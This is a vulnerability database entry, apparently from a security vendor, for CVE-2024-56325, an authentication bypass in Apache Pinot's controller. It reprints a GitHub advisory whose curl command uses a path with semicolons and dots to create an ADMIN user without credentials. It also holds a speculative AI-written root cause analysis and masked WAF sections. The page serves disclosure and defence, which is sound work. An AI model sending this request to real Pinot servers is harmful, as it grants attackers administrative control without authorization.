N/A

CVSS Score

Basic Information

CVE ID

CVE-2024-56325

GHSA ID

GHSA-6jwp-4wvj-6597

EPSS Score

0.89198%

CWE

CWE-288

Published

4/1/2025

Updated

4/1/2025

KEV Status

Technology

Java

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-56325

CVE-2024-56325: Apache Pinot Vulnerable to Authentication Bypass

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.

(GitHub Advisory)

N/A

CVSS Score

Basic Information

CVE ID

CVE-2024-56325

GHSA ID

GHSA-6jwp-4wvj-6597

EPSS Score

0.89198%

CWE

CWE-288

Published

4/1/2025

Updated

4/1/2025

KEV Status

Technology

Java

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
org.apache.pinot:pinot	maven	< 1.3.0	1.3.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from improper path handling in authentication checks. Key indicators:

The security advisory shows authentication bypass via path manipulation with semicolons and dots
BasicAuthAccessControlFactory is Pinot's known authentication component
createUser endpoint is the protected resource being accessed
The path parsing discrepancy between security filters (using raw URI) and request routing (using parsed path) would explain the bypass

While exact code changes aren't available, the combination of:

Security checks relying on request URI parsing
User management endpoints being protected resources
Path parameter handling differences between web server and application strongly suggests the authentication check in BasicAuthAccessControl and the subsequent controller method would appear in runtime traces during exploitation.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

*ut**nti**tion *yp*ss Issu* I* t** p*t* *o*s not *ont*in / *n* *ont*in., *ut**nti**tion is not r*quir**. *xp**t** Norm*l R*qu*st *n* R*spons* *x*mpl* *url -X POST -* "*ont*nt-Typ*: *ppli**tion/json" -* {\"us*rn*m*\":\"***k*\",\"p*sswor*\":\"***k\"

Reasoning

T** vuln*r**ility st*ms *rom improp*r p*t* **n*lin* in *ut**nti**tion ****ks. K*y in*i**tors: *. T** s**urity **visory s*ows *ut**nti**tion *yp*ss vi* p*t* m*nipul*tion wit* s*mi*olons *n* *ots *. **si**ut*****ss*ontrol***tory is Pinot's known *ut**n

N/A

Basic Information

Concerned about an active attack path?

CVE-2024-56325: Apache Pinot Vulnerable to Authentication Bypass

N/A

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI